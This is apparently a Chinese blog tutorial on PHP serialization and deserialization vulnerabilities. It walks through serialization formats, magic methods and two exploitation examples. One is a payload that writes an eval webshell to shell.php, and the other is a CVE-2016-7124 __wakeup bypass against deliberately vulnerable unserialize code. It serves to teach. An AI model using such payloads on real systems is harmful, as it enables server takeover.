PHP序列化和反序列化漏洞简单介绍

序列化和反序列化概念及其实现函数

序列化:就是将一个对象转换为字节序列以便于保存和传输。
serialize()函数
例子:

<?php
class People {
    public $name;
    public $age;
    public function __construct($name, $age)
    {
          $this->name = $name;
          $this->age = $age;
    }
}
$number = 123;
$str = ‘abc‘;
$bool = true;
$null = NULL;
$arr = array(‘a‘=>1, ‘b‘=>2);
$tom = new People(‘tom‘, 18);

var_dump(serialize($number));
var_dump(serialize($str));
var_dump(serialize($bool));
var_dump(serialize($null));
var_dump(serialize($arr));
var_dump(serialize($tom));
?>

输出:
string(6) "i:123;"
i表示Integer类型
string(10) "s:3:"abc";"
s表示String类型
3表示长度
string(4) "b:1;"
b表示Boolean类型
string(2) "N;"
N表示Null类型
string(30) "a:2:{s:1:"a";i:1;s:1:"b";i:2;}"
a表示Array类型
2表示Array元素个数
"O:6:"People":4:{s:4:"name";s:3:"tom";s:3:"age";i:18;s:6:"*sex";s:3:"man";s:13:"Peoplehobby";s:8:"football";}"
O表示Object类型
6表示类名占6个字符
People 类名
4表示4个属性
s表示字符串
4表示属性名长度
name 属性名
tom 属性值

这里需要注意一下protected被序列化的时候属性值会变成%00*%00属性名,private会变成%00类名%00属性名。%00是空白符,长度为1。在反序列化,也应加上相应的%00。

反序列化:是序列化的可逆过程,将字节序列重新恢复成对象。
unserialize()函数
例子:

<?php
class People {
    public $name;
    public $age;
    public $sex;
    
    public function __construct($name, $age, $sex)
    {
        $this->name = $name;
        $this->age = $age;
        $this->sex = $sex;
    }
}
$tom = ‘O:6:"People":3:{s:4:"name";s:3:"tom";s:3:"age";i:18;s:3:"sex";s:3:"man";}‘;
var_dump(unserialize($tom));
?>

输出:
object(People)#1 (3) { ["name"]=> string(3) "tom" ["age"]=> int(18) ["sex"]=> string(3) "man" }

魔术方法

__sleep():在serialize()函数序列化对象时,该函数会检查类中是否存在一个魔术方法__sleep()。如果存在,该方法会被调用,然后才执行序列化操作。可以通过重载这个方法,从而自定义序列化行为。
例子:

<?php
class People {
    public $name;
    public $age;
	public $sex;
    
	public function __construct($name, $age, $sex)
    {
        $this->name = $name;
        $this->age = $age;
		$this->sex = $sex;
    }
	
	public function __sleep()
	{
		//返回需要序列化的变量名,过滤掉sex变量
		return array(‘name‘, ‘age‘);
	}
}
$tom = new People(‘tom‘, 18, ‘man‘);
var_dump(serialize($tom));
?>

输出:
string(53) "O:6:"People":2:{s:4:"name";s:3:"tom";s:3:"age";i:18;}"
__wakeup():在unserialize()函数进行反序列化时,会检查类中是否存在__wakeup(),如果存在,__wakeup()方法会对属性进行初始化或者修改。
例子:

<?php
class People {
    public $name;
    public $age;
	public $sex;
    
	public function __construct($name, $age, $sex)
    {
        $this->name = $name;
        $this->age = $age;
		$this->sex = $sex;
    }
	
	public function __wakeup()
	{
		$this->age = 18;
	}
}
$tom = ‘O:6:"People":3:{s:4:"name";s:3:"tom";s:3:"age";i:38;s:3:"sex";s:3:"man";}‘;
var_dump(unserialize($tom));
?>

输出:
object(People)#1 (3) { ["name"]=> string(3) "tom" ["age"]=> int(18) ["sex"]=> string(3) "man" }
其它一些魔术方法

  • __construct()//创建对象时触发
  • __destruct()//对象被销毁时触发
  • __call() //在对象上下文中调用不可访问的方法时触发
  • __callStatic() //在静态上下文中调用不可访问的方法时触发
  • __get() //用于从不可访问的属性读取数据
  • __set() //用于将数据写入不可访问的属性
  • __isset() //用于在不可访问的属性上调用isset()或empty()触发
  • __unset() //在不可访问的属性上使用unset()时触发
  • __toString() //把类当作字符串使用时触发,返回值需要为字符串
  • __invoke() //当脚本尝试将对象调用为函数时触发

反序列化漏洞

如果传入反序列化函数的参数可控,并且存在一些魔术方法,就有可能触发造成反序列化漏洞。
实例1
PHP序列化和反序列化漏洞简单介绍
在第19行,unserialize函数对传入的info进行了反序列,并将得到的对象赋给了$a,在第21行将$a进行了销毁。在SaveData类中存在着魔术方法__destruct(),该方法中调用了SaveFile()函数用于保存数据到文件中。所有可以通过构造SaveData类的实例,构造一句话,写入当前路径。
payload:

O:8:"SaveData":3:{s:8:"dataFile";s:11:"./shell.php";s:7:"tmpData";s:28:"<?php eval($_POST[‘cmd‘]);?>";s:4:"name";s:6:"XiaoLi";}

实验结果:
PHP序列化和反序列化漏洞简单介绍
实例2
CVE-2016-7124(__wakeup()函数失效可绕过)

  • 漏洞影响版本:
    PHP5 < 5.6.25
    PHP7 < 7.0.10
  • 漏洞分析:
    __wakeup()触发在unserulize()调用之前,但是被序列化的字符串中成员属性数目大于实际数目时可绕过__wakeup()函数的执行。
  • 漏洞复现
<?php
    /*index.php*/
    error_reporting(0);
    include ‘wakeupTest.php‘;
    $b = unserialize($_POST[‘info‘]);
    unset($a);
?>
<?php
/*wakeupTest.php*/
class User{
    public $name = ‘guest‘;
    public $age = 10;
    public $flag = ‘Yes‘;
    public function __construct($name, $age)
    {
        $this->name = $name;
        $this->age = $age;
    }
    public function __wakeup()
    {
        if($this->age <= 18)
        {
            $this->flag = ‘No‘;
        }
    }
    public function __destruct()
    {
        if($this->flag == ‘Yes‘)
        {
            echo "flag{GoodMan}";
        }
        else
        {
            echo "Banning";
        }
    }
}
?>
  • 漏洞利用
    在wakeupTest.php中的__wakeup()会在反序列化时,根据类中的age大小对flag进行修改,而__destruct()会在对象销毁时调用,并输出相应内容。
    首先构*序列内容:
O:4:"User":3:{s:4:"name";s:6:"XiaoLi";s:3:"age";i:15;s:4:"flag";s:3:"Yes";}

如果我们直接上传,会得到:
PHP序列化和反序列化漏洞简单介绍
根据漏洞分析中的条件修改一下,把User后的3改成4:

O:4:"User":4:{s:4:"name";s:6:"XiaoLi";s:3:"age";i:15;s:4:"flag";s:3:"Yes";}

PHP序列化和反序列化漏洞简单介绍

PHP序列化和反序列化漏洞简单介绍

上一篇:webpack plugin


下一篇:66、图书管理系统及ajax简介